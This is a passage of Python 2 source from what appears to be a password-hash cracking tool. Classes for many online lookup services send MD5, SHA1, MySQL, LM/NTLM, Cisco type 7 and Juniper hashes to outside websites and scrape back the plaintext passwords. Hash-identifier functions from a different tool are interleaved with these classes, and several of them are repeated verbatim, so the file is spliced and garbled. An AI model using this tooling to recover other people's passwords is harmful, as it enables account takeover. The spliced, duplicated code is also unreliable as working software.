625.         response = do_HTTP_request ( url )
626.        
627.        
628.         html = None
629.         if response:
630.             html = response.read()
631.         else:
632.             return None
633.        
634.         match = search (r'text="[^"]+"', html)
635.        
636.         if match:
637.             return decodestring(match.group().split('"')[1])
638.         else:
639.             return None
640.  
641.  
642. class MD5_DB:
643.    
644.     name =      "md5-db"
645.     url =       "http://md5-db.de"
646.     supported_algorithm = [MD5]
647.    
648.     def isSupported (self, alg):
649.        
650.        
651.        
652.         if alg in self.supported_algorithm:
653.             return True
654.         else:
655.             return False
656.  
657.  
658.     def crack (self, hashvalue, alg):
659.        
660.        
661.        
662.        
663.        
664.         if not self.isSupported (alg):
665.             return None
666.        
667.        
668.         url = "http://md5-db.de/%s.html" % (hashvalue)
669.        
670.        
671.         response = do_HTTP_request ( url )
672.        
673.        
674.         if not response:
675.             return None
676.            
677.         html = None
678.         if response:
679.             html = response.read()
680.         else:
681.             return None
682.        
683.         match = search (r'<strong>Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden:</strong><ul><li>[^<]*</li>', html)
684.        
685.         if match:
686.             return match.group().split('li>')[1][:-2]
687.         else:
688.             return None
689.  
690.  
691.  
692.  
693. class MY_ADDR:
694.    
695.     name =      "my-addr"
696.     url =       "http://md5.my-addr.com"
697.     supported_algorithm = [MD5]
698.    
699.     def isSupported (self, alg):
700.        
701.        
702.        
703.         if alg in self.supported_algorithm:
704.             return True
705.         else:
706.             return False
707.  
708.  
709.     def crack (self, hashvalue, alg):
710.        
711.        
712.        
713.        
714.        
715.         if not self.isSupported (alg):
716.             return None
717.        
718.        
719.         url = "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php"
720.        
721.        
722.         params = { "md5" : hashvalue,
723.                "x" : 21,
724.                "y" : 8 }
725.        
726.        
727.         response = do_HTTP_request ( url, params )
728.        
729.        
730.         html = None
731.         if response:
732.             html = response.read()
733.         else:
734.             return None
735.        
736.         match = search (r"<span class='middle_title'>Hashed string</span>: [^<]*</div>", html)
737.        
738.         if match:
739.             return match.group().split('span')[2][3:-6]
740.         else:
741.             return None
742.  
743.  
744.  
745.  
746. class MD5PASS:
747.    
748.     name =      "md5pass"
749.     url =       "http://md5pass.info"
750.     supported_algorithm = [MD5]
751.    
752.     def isSupported (self, alg):
753.        
754.        
755.        
756.         if alg in self.supported_algorithm:
757.             return True
758.         else:
759.             return False
760.  
761.  
762.     def crack (self, hashvalue, alg):
763.        
764.        
765.        
766.        
767.        
768.         if not self.isSupported (alg):
769.             return None
770.        
771.        
772.         url = self.url
773.        
774.        
775.         params = { "hash" : hashvalue,
776.                "get_pass" : "Get Pass" }
777.        
778.        
779.         response = do_HTTP_request ( url, params )
780.        
781.        
782.         html = None
783.         if response:
784.             html = response.read()
785.         else:
786.             return None
787.        
788.         match = search (r"Password - <b>[^<]*</b>", html)
789.        
790.         if match:
791.             return match.group().split('b>')[1][:-2]
792.         else:
793.             return None
794.  
795.  
796.  
797. class MD5DECRYPTION:
798.    
799.     name =      "md5decryption"
800.     url =       "http://md5decryption.com"
801.     supported_algorithm = [MD5]
802.    
803.     def isSupported (self, alg):
804.        
805.        
806.        
807.         if alg in self.supported_algorithm:
808.             return True
809.         else:
810.             return False
811.  
812.  
813.     def crack (self, hashvalue, alg):
814.        
815.        
816.        
817.        
818.        
819.         if not self.isSupported (alg):
820.             return None
821.        
822.        
823.         url = self.url
824.        
825.        
826.         params = { "hash" : hashvalue,
827.                "submit" : "Decrypt It!" }
828.        
829.        
830.         response = do_HTTP_request ( url, params )
831.        
832.        
833.         html = None
834.         if response:
835.             html = response.read()
836.         else:
837.             return None
838.        
839.         match = search (r"Decrypted Text: </b>[^<]*</font>", html)
840.        
841.         if match:
842.             return match.group().split('b>')[1][:-7]
843.         else:
844.             return None
845.  
846.  
847.  
848. class MD5CRACK:
849.    
850.     name =      "md5crack"
851.     url =       "http://md5crack.com"
852.     supported_algorithm = [MD5]
853.    
854.     def isSupported (self, alg):
855.        
856.        
857.        
858.         if alg in self.supported_algorithm:
859.             return True
860.         else:
861.             return False
862.  
863.  
864.     def crack (self, hashvalue, alg):
865.        
866.        
867.        
868.        
869.        
870.         if not self.isSupported (alg):
871.             return None
872.        
873.        
874.         url = "http://md5crack.com/crackmd5.php"
875.        
876.        
877.         params = { "term" : hashvalue,
878.                "crackbtn" : "Crack that hash baby!" }
879.        
880.        
881.         response = do_HTTP_request ( url, params )
882.        
883.        
884.         html = None
885.         if response:
886.             html = response.read()
887.         else:
888.             return None
889.        
890.         match = search (r'Found: md5\("[^"]+"\)', html)
891.        
892.         if match:
893.             return match.group().split('"')[1]
894.         else:
895.             return None
896.  
897.  
898. class MD5ONLINE:
899.    
900.     name =      "md5online"
901.     url =       "http://md5online.net"
902.     supported_algorithm = [MD5]
903.    
904.     def isSupported (self, alg):
905.        
906.        
907.        
908.         if alg in self.supported_algorithm:
909.             return True
910.         else:
911.             return False
912.  
913.  
914.     def crack (self, hashvalue, alg):
915.        
916.        
917.        
918.        
919.        
920.         if not self.isSupported (alg):
921.             return None
922.        
923.        
924.         url = self.url
925.        
926.        
927.         params = { "pass" : hashvalue,
928.                "option" : "hash2text",
929.                "send" : "Submit" }
930.        
931.        
932.         response = do_HTTP_request ( url, params )
933.        
934.        
935.         html = None
936.         if response:
937.             html = response.read()
938.         else:
939.             return None
940.        
941.         match = search (r'<center><p>md5 :<b>\w*</b> <br>pass : <b>[^<]*</b></p></table>', html)
942.        
943.         if match:
944.             return match.group().split('b>')[3][:-2]
945.         else:
946.             return None
947.  
948.  
949.  
950.  
951. class MD5_DECRYPTER:
952.    
953.     name =      "md5-decrypter"
954.     url =       "http://md5-decrypter.com"
955.     supported_algorithm = [MD5]
956.    
957.     def isSupported (self, alg):
958.        
959.        
960.        
961.         if alg in self.supported_algorithm:
962.             return True
963.         else:
964.             return False
965.  
966.  
967.     def crack (self, hashvalue, alg):
968.        
969.        
970.        
971.        
972.        
973.         if not self.isSupported (alg):
974.             return None
975.        
976.        
977.         url = self.url
978.        
979.        
980.         params = { "data[Row][cripted]" : hashvalue }
981.        
982.        
983.         response = do_HTTP_request ( url, params )
984.        
985.        
986.         html = None
987.         if response:
988.             html = response.read()
989.         else:
990.             return None
991.        
992.         match = findall (r'<b class="res">[^<]*</b>', html)
993.        
994.         if match:
995.             return match[1].split('>')[1][:-3]
996.         else:
997.             return None
998.  
999.  
1000.  
1001. class AUTHSECUMD5:
1002.    
1003.     name =      "authsecu"
1004.     url =       "http://www.authsecu.com"
1005.     supported_algorithm = [MD5]
1006.    
1007.     def isSupported (self, alg):
1008.        
1009.        
1010.        
1011.         if alg in self.supported_algorithm:
1012.             return True
1013.         else:
1014.             return False
1015.  
1016.  
1017.     def crack (self, hashvalue, alg):
1018.        
1019.        
1020.        
1021.        
1022.        
1023.         if not self.isSupported (alg):
1024.             return None
1025.        
1026.        
1027.         url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/script-hash-md5.php"
1028.        
1029.        
1030.         params = { "valeur_bouton" : "dechiffrage",
1031.                "champ1" : "",
1032.                "champ2" : hashvalue,
1033.                "dechiffrer.x" : "78",
1034.                "dechiffrer.y" : "7" }
1035.        
1036.        
1037.         response = do_HTTP_request ( url, params )
1038.        
1039.        
1040.         html = None
1041.         if response:
1042.             html = response.read()
1043.         else:
1044.             return None
1045.        
1046.         match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
1047.        
1048.         if len(match) > 2:
1049.             return match[1].split('>')[2][:-3]
1050.         else:
1051.             return None
1052.  
1053.  
1054.  
1055. class HASHCRACK:
1056.    
1057.     name =      "hashcrack"
1058.     url =       "http://hashcrack.com"
1059.     supported_algorithm = [MD5, SHA1, MYSQL, LM, NTLM]
1060.    
1061.     def isSupported (self, alg):
1062.        
1063.        
1064.        
1065.         if alg in self.supported_algorithm:
1066.             return True
1067.         else:
1068.             return False
1069.  
1070.  
1071.  
1072.     def crack (self, hashvalue, alg):
1073.        
1074.        
1075.        
1076.        
1077.        
1078.         if not self.isSupported (alg):
1079.             return None
1080.        
1081.        
1082.         url = "http://hashcrack.com/indx.php"
1083.        
1084.         hash2 = None
1085.         if alg in [LM, NTLM] and ':' in hashvalue:
1086.             if alg == LM:
1087.                 hash2 = hashvalue.split(':')[0]
1088.             else:
1089.                 hash2 = hashvalue.split(':')[1]
1090.         else:
1091.             hash2 = hashvalue
1092.        
1093.         # Delete the possible starting '*'
1094.         if alg == MYSQL and hash2[0] == '*':
1095.             hash2 = hash2[1:]
1096.        
1097.        
1098.         params = { "auth" : "8272hgt",
1099.                "hash" : hash2,
1100.                "string" : "",
1101.                "Submit" : "Submit" }
1102.        
1103.        
1104.         response = do_HTTP_request ( url, params )
1105.        
1106.        
1107.         html = None
1108.         if response:
1109.             html = response.read()
1110.         else:
1111.             return None
1112.        
1113.         match = search (r'<div align=center>"[^"]*" resolves to</div><br><div align=center> <span class=hervorheb2>[^<]*</span></div></TD>', html)
1114.        
1115.         if match:
1116.             return match.group().split('hervorheb2>')[1][:-18]
1117.         else:
1118.             return None
1119.  
1120.  
1121.  
1122. class OPHCRACK:
1123.    
1124.     name =      "ophcrack"
1125.     url =       "http://www.objectif-securite.ch"
1126.     supported_algorithm = [LM, NTLM]
1127.    
1128.     def isSupported (self, alg):
1129.        
1130.        
1131.        
1132.         if alg in self.supported_algorithm:
1133.             return True
1134.         else:
1135.             return False
1136.  
1137.  
1138.  
1139.     def crack (self, hashvalue, alg):
1140.        
1141.        
1142.        
1143.        
1144.        
1145.         if not self.isSupported (alg):
1146.             return None
1147.        
1148.         if ':' not in hashvalue:
1149.             return None
1150.            
1151.         if hashvalue.split(':')[0] == "aad3b435b51404eeaad3b435b51404ee":
1152.             return None
1153.        
1154.        
1155.         url = "http://www.objectif-securite.ch/en/products.php?hash=%s" % (hashvalue.replace(':', '%3A'))
1156.        
1157.        
1158.         response = do_HTTP_request ( url )
1159.        
1160.        
1161.         html = None
1162.         if response:
1163.             html = response.read()
1164.         else:
1165.             return None
1166.        
1167.         match = search (r'<table><tr><td>Hash:</td><td>[^<]*</td></tr><tr><td><b>Password:</b></td><td><b>[^<]*</b></td>', html)
1168.        
1169.         if match:
1170.             return match.group().split('b>')[3][:-2]
1171.         else:
1172.             return None
1173.    
1174.  
1175.  
1176.    
1177.  
1178. def SHA256s():
1179.     hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
1180.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
1181.         jerar.append("120020")
1182.  
1183. def SHA384Django():
1184.     hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
1185.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
1186.         print " [+] SHA-384(Django)"
1187.         jerar.append("121020")
1188.  
1189. def SHA512():
1190.     hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
1191.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1192.         jerar.append("122020")
1193. def SHA512HMAC():
1194.     hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
1195.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1196.         jerar.append("122060")
1197. def Whirlpool():
1198.     hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
1199.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1200.         jerar.append("122040")
1201. def WhirlpoolHMAC():
1202.     hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
1203.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1204.         jerar.append("122080")
1205.  
1206. class C0LLISION:
1207.    
1208.     name =      "c0llision"
1209.     url =       "http://www.c0llision.net"
1210.     supported_algorithm = [MD5, LM, NTLM]
1211.    
1212.     def isSupported (self, alg):
1213.        
1214.        
1215.        
1216.         if alg in self.supported_algorithm:
1217.             return True
1218.         else:
1219.             return False
1220.  
1221.  
1222.  
1223.     def crack (self, hashvalue, alg):
1224.        
1225.        
1226.        
1227.        
1228.        
1229.         if not self.isSupported (alg):
1230.             return None
1231.        
1232.         if alg in [LM, NTLM] and ':' not in hashvalue:
1233.             return None
1234.            
1235.         response = do_HTTP_request ( "http://www.c0llision.net/webcrack.php" )
1236.         html = None
1237.         if response:
1238.             html = response.read()
1239.         else:
1240.             return None
1241.         match = search (r'<input type="hidden" name="hash._csrf_token." value="[^"]*" id="hash__csrf_token" />', html)
1242.         token = None
1243.         if match:
1244.             token = match.group().split('"')[5]
1245.        
1246.        
1247.         url = "http://www.c0llision.net/webcrack/request"
1248.        
1249.        
1250.         params = { "hash[_input_]" : hashvalue,
1251.                "hash[_csrf_token]" : token }
1252.        
1253.        
1254.         response = do_HTTP_request ( url, params )
1255.        
1256.        
1257.         html = None
1258.         if response:
1259.             html = response.read()
1260.         else:
1261.             return None
1262.        
1263.         match = None
1264.         if alg in [LM, NTLM]:
1265.             html = html.replace('\n', '')
1266.             result = ""
1267.            
1268.             match = search (r'<table class="pre">.*?</table>', html)
1269.             if match:
1270.                 try:
1271.                     doc = parseDoc ( match.group() )
1272.                 except:
1273.                     print "INFO: You need libxml2 to use this plugin."
1274.                     return None
1275.                 lines = doc.xpathEval("//tr")
1276.                 for l in lines:
1277.                     doc = parseDoc ( str(l) )
1278.                     cols = doc.xpathEval("//td")
1279.                    
1280.                     if len(cols) < 4:
1281.                         return None
1282.                    
1283.                     if cols[2].content:
1284.                         result = " > %s (%s) = %s\n" % ( cols[1].content, cols[2].content, cols[3].content )
1285.                
1286.                 return ( result and result.split()[-1] or None )
1287.            
1288.         else:
1289.             match = search (r'<td class="plaintext">[^<]*</td>', html)
1290.        
1291.             if match:
1292.                 return match.group().split('>')[1][:-4]
1293.        
1294.         return None
1295.  
1296.  
1297.  
1298. def SHA384HMAC():
1299.     hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
1300.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1301.         jerar.append("119040")
1302.  
1303. def SHA256s():
1304.     hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
1305.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
1306.         jerar.append("120020")
1307.  
1308. def SHA384Django():
1309.     hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
1310.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
1311.         print " [+] SHA-384(Django)"
1312.         jerar.append("121020")
1313.  
1314. def SHA512():
1315.     hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
1316.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1317.         jerar.append("122020")
1318. def SHA512HMAC():
1319.     hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
1320.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1321.         jerar.append("122060")
1322. def Whirlpool():
1323.     hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
1324.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1325.         jerar.append("122040")
1326. def WhirlpoolHMAC():
1327.     hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
1328.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1329.         jerar.append("122080")
1330.  
1331. class REDNOIZE:
1332.    
1333.     name =      "rednoize"
1334.     url =       "http://md5.rednoize.com"
1335.     supported_algorithm = [MD5, SHA1]
1336.    
1337.     def isSupported (self, alg):
1338.        
1339.        
1340.        
1341.         if alg in self.supported_algorithm:
1342.             return True
1343.         else:
1344.             return False
1345.  
1346.  
1347.     def crack (self, hashvalue, alg):
1348.        
1349.        
1350.        
1351.        
1352.        
1353.         if not self.isSupported (alg):
1354.             return None
1355.        
1356.        
1357.         url = ""
1358.         if alg == MD5:
1359.             url = "http://md5.rednoize.com/?p&s=md5&q=%s&_=" % (hashvalue)
1360.         else:
1361.             url = "http://md5.rednoize.com/?p&s=sha1&q=%s&_=" % (hashvalue)
1362.        
1363.        
1364.         response = do_HTTP_request ( url )
1365.        
1366.        
1367.         html = None
1368.         if response:
1369.             html = response.read()
1370.         else:
1371.             return None
1372.        
1373.         return html
1374.            
1375.            
1376.  
1377.  
1378. class CMD5:
1379.    
1380.     name =      "cmd5"
1381.     url =       "http://www.cmd5.org"
1382.     supported_algorithm = [MD5, NTLM]
1383.    
1384.     def isSupported (self, alg):
1385.        
1386.        
1387.        
1388.         if alg in self.supported_algorithm:
1389.             return True
1390.         else:
1391.             return False
1392.  
1393.  
1394.     def crack (self, hashvalue, alg):
1395.        
1396.        
1397.        
1398.        
1399.        
1400.         if not self.isSupported (alg):
1401.             return None
1402.        
1403.         response = do_HTTP_request ( "http://www.cmd5.org/" )
1404.         html = None
1405.         if response:
1406.             html = response.read()
1407.         else:
1408.             return None
1409.        
1410.         match = search (r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[^"]*" />', html)
1411.         viewstate = None
1412.         if match:
1413.             viewstate = match.group().split('"')[7]
1414.        
1415.         match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField1" id="ctl00_ContentPlaceHolder1_HiddenField1" value="[^"]*" />', html)
1416.         ContentPlaceHolder1 = ""
1417.         if match:
1418.             ContentPlaceHolder1 = match.group().split('"')[7]
1419.        
1420.         match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField2" id="ctl00_ContentPlaceHolder1_HiddenField2" value="[^"]*" />', html)
1421.         ContentPlaceHolder2 = ""
1422.         if match:
1423.             ContentPlaceHolder2 = match.group().split('"')[7]
1424.        
1425.        
1426.         url = "http://www.cmd5.org/"
1427.        
1428.         hash2 = ""
1429.         if alg == MD5:
1430.             hash2 = hashvalue
1431.         else:
1432.             if ':' in hashvalue:
1433.                 hash2 = hashvalue.split(':')[1]
1434.        
1435.        
1436.         params = { "__EVENTTARGET" : "",
1437.                "__EVENTARGUMENT" : "",
1438.                "__VIEWSTATE" : viewstate,
1439.                "ctl00$ContentPlaceHolder1$TextBoxq" : hash2,
1440.                "ctl00$ContentPlaceHolder1$InputHashType" : alg,
1441.                "ctl00$ContentPlaceHolder1$Button1" : "decrypt",
1442.                "ctl00$ContentPlaceHolder1$HiddenField1" : ContentPlaceHolder1,
1443.                "ctl00$ContentPlaceHolder1$HiddenField2" : ContentPlaceHolder2 }
1444.                
1445.         header = { "Referer" : "http://www.cmd5.org/" }
1446.        
1447.        
1448.         response = do_HTTP_request ( url, params, header )
1449.        
1450.        
1451.         html = None
1452.         if response:
1453.             html = response.read()
1454.         else:
1455.             return None
1456.        
1457.         match = search (r'<span id="ctl00_ContentPlaceHolder1_LabelResult">[^<]*</span>', html)
1458.        
1459.         if match:
1460.             return match.group().split('>')[1][:-6]
1461.         else:
1462.             return None
1463.  
1464.  
1465. def SNEFRU256HMAC():
1466.     hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
1467.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1468.         jerar.append("115180")
1469. def SHA256md5pass():
1470.     hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
1471.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1472.         jerar.append("115200")
1473. def SHA256sha1pass():
1474.     hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
1475.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1476.         jerar.append("115220")
1477.  
1478. def MD5passsaltjoomla2():
1479.     hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
1480.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
1481.         jerar.append("116020")
1482. def SAM():
1483.     hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
1484.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
1485.         jerar.append("116040")
1486.  
1487. def SHA256Django():
1488.     hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
1489.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
1490.         jerar.append("117020")
1491.  
1492. def RipeMD320():
1493.     hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
1494.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1495.         jerar.append("118020")
1496. def RipeMD320HMAC():
1497.     hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
1498.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1499.         jerar.append("118040")
1500.  
1501. class AUTHSECUCISCO7:
1502.    
1503.     name =      "authsecu"
1504.     url =       "http://www.authsecu.com"
1505.     supported_algorithm = [CISCO7]
1506.    
1507.     def isSupported (self, alg):
1508.        
1509.        
1510.        
1511.         if alg in self.supported_algorithm:
1512.             return True
1513.         else:
1514.             return False
1515.  
1516.  
1517.  
1518.     def crack (self, hashvalue, alg):
1519.        
1520.        
1521.        
1522.        
1523.        
1524.         if not self.isSupported (alg):
1525.             return None
1526.        
1527.        
1528.         url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-password-cisco-7/script-password-cisco-7-launcher.php"
1529.        
1530.        
1531.         params = { "valeur_bouton" : "dechiffrage",
1532.                "champ1" : hashvalue,
1533.                "dechiffrer.x" : 43,
1534.                "dechiffrer.y" : 16 }
1535.                
1536.        
1537.         response = do_HTTP_request ( url, params )
1538.        
1539.        
1540.         html = None
1541.         if response:
1542.             html = response.read()
1543.         else:
1544.             return None
1545.        
1546.         match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
1547.        
1548.         if match:
1549.             return match[1].split('>')[2][:-3]
1550.         else:
1551.             return None
1552.  
1553.  
1554.  
1555.  
1556. class CACIN:
1557.    
1558.     name =      "cacin"
1559.     url =       "http://cacin.net"
1560.     supported_algorithm = [CISCO7]
1561.    
1562.     def isSupported (self, alg):
1563.        
1564.        
1565.        
1566.         if alg in self.supported_algorithm:
1567.             return True
1568.         else:
1569.             return False
1570.  
1571.  
1572.  
1573.     def crack (self, hashvalue, alg):
1574.        
1575.        
1576.        
1577.        
1578.        
1579.         if not self.isSupported (alg):
1580.             return None
1581.        
1582.        
1583.         url = "http://cacin.net/cgi-bin/decrypt-cisco.pl?cisco_hash=%s" % (hashvalue)
1584.        
1585.        
1586.         response = do_HTTP_request ( url )
1587.        
1588.        
1589.         html = None
1590.         if response:
1591.             html = response.read()
1592.         else:
1593.             return None
1594.        
1595.         match = search (r'<tr>Cisco password 7: [^<]*</tr><br><tr><th><br>Decrypted password: .*', html)
1596.        
1597.         if match:
1598.             return match.group().split(':')[2][1:]
1599.         else:
1600.             return None
1601.  
1602.  
1603. class IBEAST:
1604.    
1605.     name =      "ibeast"
1606.     url =       "http://www.ibeast.com"
1607.     supported_algorithm = [CISCO7]
1608.    
1609.     def isSupported (self, alg):
1610.        
1611.        
1612.        
1613.         if alg in self.supported_algorithm:
1614.             return True
1615.         else:
1616.             return False
1617.  
1618.  
1619.  
1620.     def crack (self, hashvalue, alg):
1621.        
1622.        
1623.        
1624.        
1625.        
1626.         if not self.isSupported (alg):
1627.             return None
1628.        
1629.        
1630.         url = "http://www.ibeast.com/content/tools/CiscoPassword/decrypt.php?txtPassword=%s&submit1=Enviar+consulta" % (hashvalue)
1631.        
1632.        
1633.         response = do_HTTP_request ( url )
1634.        
1635.        
1636.         html = None
1637.         if response:
1638.             html = response.read()
1639.         else:
1640.             return None
1641.        
1642.         match = search (r'<font size="\+2">Your Password is [^<]*<br>', html)
1643.        
1644.         if match:
1645.             return match.group().split('is ')[1][:-4]
1646.         else:
1647.             return None
1648.  
1649.  
1650.  
1651. def SHA256():
1652.     hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
1653.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1654.         jerar.append("115020")
1655. def SHA256HMAC():
1656.     hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
1657.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1658.         jerar.append("115120")
1659. def Haval256():
1660.     hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
1661.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1662.         jerar.append("115040")
1663. def Haval256HMAC():
1664.     hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
1665.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1666.         jerar.append("115140")
1667. def GOSTR341194():
1668.     hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
1669.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1670.         jerar.append("115060")
1671. def RipeMD256():
1672.     hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
1673.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1674.         jerar.append("115080")
1675. def RipeMD256HMAC():
1676.     hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
1677.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1678.         jerar.append("115160")
1679. def SNEFRU256():
1680.     hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
1681.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1682.         jerar.append("115100")
1683.  
1684. def SHA384():
1685.     hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
1686.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1687.         jerar.append("119020")
1688.  
1689.  
1690. class PASSWORD_DECRYPT:
1691.    
1692.     name =      "password-decrypt"
1693.     url =       "http://password-decrypt.com"
1694.     supported_algorithm = [CISCO7, JUNIPER]
1695.    
1696.     def isSupported (self, alg):
1697.        
1698.        
1699.        
1700.         if alg in self.supported_algorithm:
1701.             return True
1702.         else:
1703.             return False
1704.  
1705.  
1706.  
1707.     def crack (self, hashvalue, alg):
1708.        
1709.        
1710.        
1711.        
1712.        
1713.         if not self.isSupported (alg):
1714.             return None
1715.        
1716.        
1717.         url = ""
1718.         params = None
1719.         if alg == CISCO7:
1720.             url = "http://password-decrypt.com/cisco.cgi"
1721.             params = { "submit" : "Submit",
1722.                 "cisco_password" : hashvalue,
1723.                 "submit" : "Submit" }
1724.         else:
1725.             url = "http://password-decrypt.com/juniper.cgi"
1726.             params = { "submit" : "Submit",
1727.                 "juniper_password" : hashvalue,
1728.                 "submit" : "Submit" }
1729.        
1730.        
1731.        
1732.         response = do_HTTP_request ( url, params )
1733.        
1734.        
1735.         html = None
1736.         if response:
1737.             html = response.read()
1738.         else:
1739.             return None
1740.        
1741.         match = search (r'Decrypted Password:&nbsp;<B>[^<]*</B> </p>', html)
1742.        
